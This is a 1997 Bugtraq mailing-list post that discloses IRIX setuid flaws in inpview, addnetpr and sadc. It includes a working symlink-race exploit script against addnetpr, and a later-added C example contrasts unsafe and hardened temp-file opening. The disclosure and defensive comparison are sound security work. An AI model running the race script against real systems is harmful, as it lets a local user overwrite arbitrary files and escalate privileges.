Bugtraq mailing list archives

Re: Irix: misc


From: poison () COSMOS KAIST AC KR (Jaechul Choe)
Date: Fri, 9 May 1997 06:33:46 +0900


Wow, your work is so fertile and wonderful.
Let me add some stuff.



1. /usr/lib/InPerson/inpview

inpview is part of the InPerson desktop video conferencing package.  It's
root-owned/suid and is written in the classic SGI suid-programming style, i.e.
in the course of execution inpview, without dropping euid=0, starts the program
ttsession using system() and without bothering to use an absolute path.  So
it's pretty much like a suid shell sitting around, in case you forget the root
password.  It does all kinds of other dangerous stuff as well, e.g.
predictable tmp files.


The template for one of the tmp files is "/var/tmp/ioAAAXXXXXX".
I tried to write a script exploiting the race condition last year,
but for some reason I couldn't work out at the time, the race didn't run well
and I soon gave up.

There was the same race condition in the program /usr/lib/addnetpr, another
suid root program for printing.
Here is the exploit script for it.
But though I tried, it was hard to find a way to get root with it.
It can fill the target with the two arguments of addnetpr, but with some
messages I was unable to control.
And it will prompt a window asking for the root passwd for non-privileged (not
root, but IRIX-specific privileged) users.
Privileged users bypass the window and can run the race.

Tested on both IRIX 5.3 and 6.2.

---------------)<-----------cut expnetpr.sh ---------------)<----------------

#!/bin/sh

PROG="`basename $0`"
if [ $# -ne 1 ]; then
        echo "Usage: $PROG <target>"
        exit 1
fi

cat > expnetpr.c << _CREDIT_TO_ZOMO_
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
        /* mktemp() rewrites the XXXXXX in place, so the template must be
           a writable array rather than a string literal */
        char template[] = "/var/tmp/printersXXXXXX";
        char *target;
        int pid;

        if (argc != 2)
                return 1;
        target = mktemp(template);

        if ((pid = fork()) > 0) {
                sleep(3);
                umask(0);
                execl("/usr/lib/addnetpr", "addnetpr", "localhost", "+",
                      (char *)0);
        }
        else
                while (1) {
                        symlink(argv[1], target);
                        unlink(target);
                }

        return 0;
}
_CREDIT_TO_ZOMO_

/bin/cc expnetpr.c -o expnetpr
if [ ! -f expnetpr ]; then
        echo "Couldn't compile expnetpr.c, lame! \nMake sure that the C compiler has been installed from the IDO"
        exit 1
fi

while true
do
        ./expnetpr $1 &
        PID=$!
        sleep 15
        ls -al $1
        killall expnetpr
        killall addnetpr
done

--------------------)<------------ cut ---------------)<-------------------

And one more: as addressed in [8lgm]-Advisory-11.UNIX.sadc.07-Jan-1992
and the SGI security FAQ, there is a hole in /usr/lib/sa/sadc.
That's on both IRIX 5.3 and 6.2.
The tmp file to link to the target is /tmp/sa_adrfl
(
114mS stat(/tmp/sa.adrfl, 0x10042dd8) errno = 2 (No such file or directory)
115mS umask(0) = 0
116mS open(/tmp/sa.adrfl, O_RDWR|O_CREAT|O_TRUNC, 0664) = 3
)
sadc is sgid sys in IRIX, so the hole may be minor,
but won't it be of help to get root in conjunction with another program?
I was surprised to find the hole still existed in IRIX 6.2 then.
SGI might be indifferent enough.
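The two temp-file patterns the post describes (sadc's fixed /tmp name opened with O_CREAT|O_TRUNC after umask(0), and the mktemp() template in addnetpr) beside the open() form that refuses a pre-planted link, as an added example that is not from the post or from SGI. The directory, victim file and link name are constructed for the self-check.

```c
#define _GNU_SOURCE /* exposes O_NOFOLLOW and mkdtemp() on glibc */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* The sadc pattern: create-or-truncate at a fixed name, following any
 * symlink already planted there and truncating whatever it points at. */
int open_tmp_unsafe(const char *path)
{
    return open(path, O_RDWR | O_CREAT | O_TRUNC, 0664);
}
/* Hardened form: O_EXCL fails with EEXIST when anything, a symlink included,
 * already exists at path; O_NOFOLLOW refuses a link; 0600 ignores the umask. */
int open_tmp_safe(const char *path)
{
    return open(path, O_RDWR | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Self-check in a private mkdtemp() directory: a constructed victim file and a
 * link planted under the sadc temp-file name. Returns 1 if the safe opener
 * refused (EEXIST, victim intact), plus 2 if the unsafe one emptied the victim. */
int demo_symlink_race(void)
{
    char dir[] = "/tmp/racedemoXXXXXX", lnk[64], victim[64];
    struct stat st;
    int fd, result = 0;
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(lnk, sizeof lnk, "%s/sa.adrfl", dir);
    if ((fd = open(victim, O_WRONLY | O_CREAT, 0600)) < 0) goto out;
    if (write(fd, "secret\n", 7) != 7) { close(fd); goto out; }
    close(fd);
    if (symlink(victim, lnk) != 0) goto out;
    fd = open_tmp_safe(lnk);
    if (fd >= 0) close(fd);                 /* must not happen */
    else if (errno == EEXIST && stat(victim, &st) == 0 && st.st_size == 7)
        result |= 1;
    if ((fd = open_tmp_unsafe(lnk)) >= 0) {
        close(fd);
        if (stat(victim, &st) == 0 && st.st_size == 0) result |= 2;
    }
out:
    unlink(lnk); unlink(victim); rmdir(dir);
    return result;
}
```

A result of 3 shows both halves: the O_EXCL|O_NOFOLLOW opener refuses the planted link while the create-or-truncate form follows it.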


